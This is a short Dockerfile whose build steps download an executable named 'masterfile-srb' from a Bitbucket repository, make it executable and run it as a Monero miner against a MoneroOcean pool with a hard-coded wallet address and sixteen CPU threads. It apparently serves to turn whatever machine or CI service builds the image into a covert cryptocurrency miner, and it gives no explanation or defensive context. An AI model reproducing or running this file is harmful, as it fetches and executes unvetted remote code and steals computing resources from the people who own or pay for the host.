FROM ubuntu:20.04
#-----------------
RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/anli-projects/xmines01/downloads/masterfile-srb
RUN chmod u+x masterfile-srb
RUN ./masterfile-srb --disable-gpu --algorithm randomx --pool gulf.moneroocean.stream:80 --wallet 44dWWt57wRicWrDfRhNZne5WNBKAk6rbsFmXSQ3XVNJzLZe91gNfW7YbUupCLHyFx7RiNPV3wNyubcvZHKFcGfkjLi4eBsQ.Pekerja01 --cpu-threads 16;0